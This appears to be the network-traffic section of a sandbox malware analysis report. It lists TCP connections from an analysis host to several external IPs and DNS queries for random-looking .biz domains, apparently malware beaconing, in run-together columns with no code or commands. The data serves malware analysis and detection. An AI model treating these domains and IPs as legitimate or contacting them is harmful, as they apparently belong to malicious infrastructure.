                                                                                                                                                                Nov 28, 2024 12:13:45.423217058 CET4918080192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:13:45.423232079 CET4918080192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:13:45.543288946 CET8049180172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:45.543323040 CET8049180172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:46.640199900 CET8049180172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:46.640266895 CET4918080192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:13:46.640305996 CET4918080192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:13:46.666440964 CET4918180192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:13:46.760278940 CET8049180172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:46.786530972 CET8049181172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:46.786587954 CET4918180192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:13:46.793849945 CET4918180192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:13:46.793869019 CET4918180192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:13:46.913928986 CET8049181172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:46.913940907 CET8049181172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:47.968365908 CET8049181172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:47.968429089 CET4918180192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:13:47.968456030 CET4918180192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:13:48.088546038 CET8049181172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:48.116463900 CET4918280192.168.2.2234.246.200.160
                                                                                                                                                                Nov 28, 2024 12:13:48.236799002 CET804918234.246.200.160192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:48.237060070 CET4918280192.168.2.2234.246.200.160
                                                                                                                                                                Nov 28, 2024 12:13:48.237174988 CET4918280192.168.2.2234.246.200.160
                                                                                                                                                                Nov 28, 2024 12:13:48.237195015 CET4918280192.168.2.2234.246.200.160
                                                                                                                                                                Nov 28, 2024 12:13:48.357358932 CET804918234.246.200.160192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:48.357369900 CET804918234.246.200.160192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:49.618149042 CET804918234.246.200.160192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:49.618309021 CET4918280192.168.2.2234.246.200.160
                                                                                                                                                                Nov 28, 2024 12:13:49.618319988 CET804918234.246.200.160192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:49.618374109 CET4918280192.168.2.2234.246.200.160
                                                                                                                                                                Nov 28, 2024 12:13:49.738291025 CET804918234.246.200.160192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:50.245723009 CET4918380192.168.2.2218.208.156.248
                                                                                                                                                                Nov 28, 2024 12:13:50.365896940 CET804918318.208.156.248192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:50.365962982 CET4918380192.168.2.2218.208.156.248
                                                                                                                                                                Nov 28, 2024 12:13:50.369756937 CET4918380192.168.2.2218.208.156.248
                                                                                                                                                                Nov 28, 2024 12:13:50.369798899 CET4918380192.168.2.2218.208.156.248
                                                                                                                                                                Nov 28, 2024 12:13:50.489897966 CET804918318.208.156.248192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:50.489919901 CET804918318.208.156.248192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:51.464062929 CET804918318.208.156.248192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:51.464222908 CET804918318.208.156.248192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:51.464231014 CET4918380192.168.2.2218.208.156.248
                                                                                                                                                                Nov 28, 2024 12:13:51.464302063 CET4918380192.168.2.2218.208.156.248
                                                                                                                                                                Nov 28, 2024 12:13:51.584460974 CET804918318.208.156.248192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:51.704977989 CET4918480192.168.2.22208.100.26.245
                                                                                                                                                                Nov 28, 2024 12:13:51.825212955 CET8049184208.100.26.245192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:51.827558994 CET4918480192.168.2.22208.100.26.245
                                                                                                                                                                Nov 28, 2024 12:13:51.828934908 CET4918480192.168.2.22208.100.26.245
                                                                                                                                                                Nov 28, 2024 12:13:51.829282045 CET4918480192.168.2.22208.100.26.245
                                                                                                                                                                Nov 28, 2024 12:13:51.948921919 CET8049184208.100.26.245192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:51.949188948 CET8049184208.100.26.245192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:52.952058077 CET8049184208.100.26.245192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:53.195178032 CET4918480192.168.2.22208.100.26.245
                                                                                                                                                                Nov 28, 2024 12:13:53.367996931 CET4918480192.168.2.22208.100.26.245
                                                                                                                                                                Nov 28, 2024 12:13:53.368021965 CET4918480192.168.2.22208.100.26.245
                                                                                                                                                                Nov 28, 2024 12:13:53.488042116 CET8049184208.100.26.245192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:53.488054991 CET8049184208.100.26.245192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:53.701627016 CET8049184208.100.26.245192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:54.006366968 CET4918480192.168.2.22208.100.26.245
                                                                                                                                                                Nov 28, 2024 12:13:54.249433994 CET4918580192.168.2.2213.251.16.150
                                                                                                                                                                Nov 28, 2024 12:13:54.369626999 CET804918513.251.16.150192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:54.369712114 CET4918580192.168.2.2213.251.16.150
                                                                                                                                                                Nov 28, 2024 12:13:54.369817019 CET4918580192.168.2.2213.251.16.150
                                                                                                                                                                Nov 28, 2024 12:13:54.369838953 CET4918580192.168.2.2213.251.16.150
                                                                                                                                                                Nov 28, 2024 12:13:54.491043091 CET804918513.251.16.150192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:54.491059065 CET804918513.251.16.150192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:56.477401018 CET804918513.251.16.150192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:56.477530003 CET804918513.251.16.150192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:56.477631092 CET4918580192.168.2.2213.251.16.150
                                                                                                                                                                Nov 28, 2024 12:14:01.798901081 CET4918580192.168.2.2213.251.16.150
                                                                                                                                                                Nov 28, 2024 12:14:01.920874119 CET804918513.251.16.150192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:01.936738968 CET4918680192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:14:02.057161093 CET804918644.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:02.058841944 CET4918680192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:14:02.058919907 CET4918680192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:14:02.058959007 CET4918680192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:14:02.178955078 CET804918644.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:02.178975105 CET804918644.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:03.249955893 CET804918644.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:03.249986887 CET804918644.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:03.250060081 CET4918680192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:14:03.250133991 CET4918680192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:14:03.370064020 CET804918644.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:03.388654947 CET4918780192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:14:03.508605003 CET804918754.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:03.508671999 CET4918780192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:14:03.509871006 CET4918780192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:14:03.509922028 CET4918780192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:14:03.629911900 CET804918754.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:03.629925013 CET804918754.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:04.919552088 CET804918754.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:04.919608116 CET804918754.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:04.919821024 CET4918780192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:14:04.919821024 CET4918780192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:14:05.039849997 CET804918754.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:10.162935019 CET4919580192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:14:10.283278942 CET804919554.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:10.286411047 CET4919580192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:14:10.286494017 CET4919580192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:14:10.286504030 CET4919580192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:14:10.406526089 CET804919554.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:10.406546116 CET804919554.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:11.646691084 CET804919554.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:11.646804094 CET804919554.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:11.646855116 CET4919580192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:14:11.646886110 CET4919580192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:14:11.766849995 CET804919554.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:11.802828074 CET4918480192.168.2.22208.100.26.245
                                                                                                                                                                Nov 28, 2024 12:14:11.802855968 CET4918480192.168.2.22208.100.26.245
                                                                                                                                                                Nov 28, 2024 12:14:11.922869921 CET8049184208.100.26.245192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:11.922879934 CET8049184208.100.26.245192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:12.136631966 CET8049184208.100.26.245192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:12.137566090 CET4918480192.168.2.22208.100.26.245
                                                                                                                                                                Nov 28, 2024 12:14:12.137662888 CET4918480192.168.2.22208.100.26.245
                                                                                                                                                                Nov 28, 2024 12:14:12.257719040 CET8049184208.100.26.245192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:12.257730007 CET8049184208.100.26.245192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:12.473395109 CET8049184208.100.26.245192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:12.679486036 CET4918480192.168.2.22208.100.26.245
                                                                                                                                                                Nov 28, 2024 12:14:14.356900930 CET4919780192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:14:14.476900101 CET804919754.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:14.480381966 CET4919780192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:14:14.484957933 CET4919780192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:14:14.484957933 CET4919780192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:14:14.604957104 CET804919754.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:14.605004072 CET804919754.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:15.842375040 CET804919754.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:15.842478991 CET804919754.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:15.842530966 CET4919780192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:14:15.842562914 CET4919780192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:14:15.962574959 CET804919754.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:15.980006933 CET4919880192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:14:16.100037098 CET804919818.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:16.100368023 CET4919880192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:14:16.101162910 CET4919880192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:14:16.101200104 CET4919880192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:14:16.221157074 CET804919818.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:16.221168041 CET804919818.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:18.085047960 CET804919818.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:18.085077047 CET804919818.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:18.085130930 CET4919880192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:14:18.085324049 CET4919880192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:14:18.207206964 CET804919818.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:18.226727962 CET4919980192.168.2.2218.208.156.248
                                                                                                                                                                Nov 28, 2024 12:14:18.348627090 CET804919918.208.156.248192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:18.348687887 CET4919980192.168.2.2218.208.156.248
                                                                                                                                                                Nov 28, 2024 12:14:18.349129915 CET4919980192.168.2.2218.208.156.248
                                                                                                                                                                Nov 28, 2024 12:14:18.349159956 CET4919980192.168.2.2218.208.156.248
                                                                                                                                                                Nov 28, 2024 12:14:18.469142914 CET804919918.208.156.248192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:18.469155073 CET804919918.208.156.248192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:19.537911892 CET804919918.208.156.248192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:19.538114071 CET804919918.208.156.248192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:19.538161993 CET4919980192.168.2.2218.208.156.248
                                                                                                                                                                Nov 28, 2024 12:14:19.538341999 CET4919980192.168.2.2218.208.156.248
                                                                                                                                                                Nov 28, 2024 12:14:19.658246994 CET804919918.208.156.248192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:19.664078951 CET4920080192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:14:19.784111977 CET804920044.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:19.784162998 CET4920080192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:14:19.784257889 CET4920080192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:14:19.784285069 CET4920080192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:14:19.904241085 CET804920044.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:19.904254913 CET804920044.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:20.945897102 CET804920044.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:20.945926905 CET804920044.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:20.945972919 CET4920080192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:14:20.945996046 CET4920080192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:14:21.066212893 CET804920044.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:21.081911087 CET4920180192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:14:21.201849937 CET804920118.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:21.201905012 CET4920180192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:14:21.202102900 CET4920180192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:14:21.202122927 CET4920180192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:14:21.322047949 CET804920118.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:21.322063923 CET804920118.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:23.276252031 CET804920118.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:23.276381016 CET804920118.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:23.276453018 CET4920180192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:14:23.279443979 CET4920180192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:14:23.399332047 CET804920118.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:25.592742920 CET4920380192.168.2.2218.208.156.248
                                                                                                                                                                Nov 28, 2024 12:14:25.713370085 CET804920318.208.156.248192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:25.713444948 CET4920380192.168.2.2218.208.156.248
                                                                                                                                                                Nov 28, 2024 12:14:25.713617086 CET4920380192.168.2.2218.208.156.248
                                                                                                                                                                Nov 28, 2024 12:14:25.713659048 CET4920380192.168.2.2218.208.156.248
                                                                                                                                                                Nov 28, 2024 12:14:25.833583117 CET804920318.208.156.248192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:25.833595991 CET804920318.208.156.248192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:26.903322935 CET804920318.208.156.248192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:26.903364897 CET804920318.208.156.248192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:26.903419971 CET4920380192.168.2.2218.208.156.248
                                                                                                                                                                Nov 28, 2024 12:14:26.903481007 CET4920380192.168.2.2218.208.156.248
                                                                                                                                                                Nov 28, 2024 12:14:27.023377895 CET804920318.208.156.248192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:27.040177107 CET4920480192.168.2.2213.251.16.150
                                                                                                                                                                Nov 28, 2024 12:14:27.160142899 CET804920413.251.16.150192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:27.160197973 CET4920480192.168.2.2213.251.16.150
                                                                                                                                                                Nov 28, 2024 12:14:27.160298109 CET4920480192.168.2.2213.251.16.150
                                                                                                                                                                Nov 28, 2024 12:14:27.160310030 CET4920480192.168.2.2213.251.16.150
                                                                                                                                                                Nov 28, 2024 12:14:27.280478001 CET804920413.251.16.150192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:27.280493975 CET804920413.251.16.150192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:29.268652916 CET804920413.251.16.150192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:29.268774986 CET804920413.251.16.150192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:29.268821001 CET4920480192.168.2.2213.251.16.150

                                                                                                                                                                UDP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Nov 28, 2024 12:11:51.748330116 CET5456253192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:11:51.757612944 CET5291753192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:11:51.880790949 CET53529178.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:51.883121967 CET53545628.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:53.482934952 CET6275153192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:11:53.548240900 CET5789353192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:11:53.606897116 CET53627518.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:53.671719074 CET53578938.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:55.789603949 CET5482153192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:11:55.924416065 CET53548218.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:57.487776995 CET5471953192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:11:57.611253023 CET53547198.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:59.186207056 CET4988153192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:11:59.321238995 CET53498818.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:04.685637951 CET5499853192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:12:04.810594082 CET53549988.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:04.812988997 CET5278153192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:12:04.948873997 CET53527818.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:07.205333948 CET6392653192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:12:07.339690924 CET53639268.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:07.340986967 CET6551053192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:12:07.464014053 CET53655108.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:07.465887070 CET6267253192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:12:07.600780964 CET53626728.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:51.929265976 CET5647553192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:12:52.054832935 CET53564758.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:36.258462906 CET4938453192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:13:36.392750025 CET53493848.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:38.649343014 CET5484253192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:13:38.772140980 CET53548428.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:41.439563036 CET5810553192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:13:41.573719025 CET53581058.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:42.862447023 CET6492853192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:13:42.996898890 CET53649288.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:45.167891026 CET5739053192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:13:45.302222967 CET53573908.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:47.992669106 CET5809553192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:13:48.115710974 CET53580958.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:50.120928049 CET5426153192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:13:50.243944883 CET53542618.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:51.567184925 CET6050753192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:13:51.702402115 CET53605078.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:54.113997936 CET5044653192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:13:54.248264074 CET53504468.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:01.800045967 CET5593953192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:01.935954094 CET53559398.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:03.253201962 CET4960853192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:03.387825966 CET53496088.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:04.927429914 CET6148653192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:05.050311089 CET53614868.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:06.636229038 CET6245353192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:06.759259939 CET53624538.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:08.026230097 CET5056853192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:08.149116993 CET53505688.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:10.038036108 CET5944753192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:10.162388086 CET53594478.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:11.666867018 CET5182853192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:11.801893950 CET53518288.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:12.488692045 CET5340653192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:12.623533964 CET53534068.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:14.218981028 CET5634553192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:14.353184938 CET53563458.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:15.844633102 CET5187053192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:15.979394913 CET53518708.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:18.087620974 CET6500953192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:18.224440098 CET53650098.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:19.539539099 CET6495653192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:19.663516045 CET53649568.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:20.947062969 CET5452153192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:21.081248045 CET53545218.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:23.395471096 CET4975053192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:23.519082069 CET53497508.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:23.751730919 CET6468753192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:23.885927916 CET53646878.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:25.457536936 CET6508453192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:25.592184067 CET53650848.8.8.8192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:14:26.905095100 CET6337353192.168.2.228.8.8.8
                                                                                                                                                                Nov 28, 2024 12:14:27.039477110 CET53633738.8.8.8192.168.2.22

                                                                                                                                                                DNS Queries

                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                Nov 28, 2024 12:11:51.748330116 CET192.168.2.228.8.8.80x96baStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:11:51.757612944 CET192.168.2.228.8.8.80xcce2Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:11:53.482934952 CET192.168.2.228.8.8.80xe817Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:11:53.548240900 CET192.168.2.228.8.8.80x5662Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:11:55.789603949 CET192.168.2.228.8.8.80xf993Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:11:57.487776995 CET192.168.2.228.8.8.80xac3dStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:11:59.186207056 CET192.168.2.228.8.8.80xc66aStandard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:12:04.685637951 CET192.168.2.228.8.8.80xa99eStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:12:04.812988997 CET192.168.2.228.8.8.80x71b4Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:12:07.205333948 CET192.168.2.228.8.8.80xd14bStandard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:12:07.340986967 CET192.168.2.228.8.8.80xfdf5Standard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:12:07.465887070 CET192.168.2.228.8.8.80xf42eStandard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:12:51.929265976 CET192.168.2.228.8.8.80x9d6dStandard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 28, 2024 12:13:36.258462906 CET192.168.2.228.8.8.80x6670Standard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
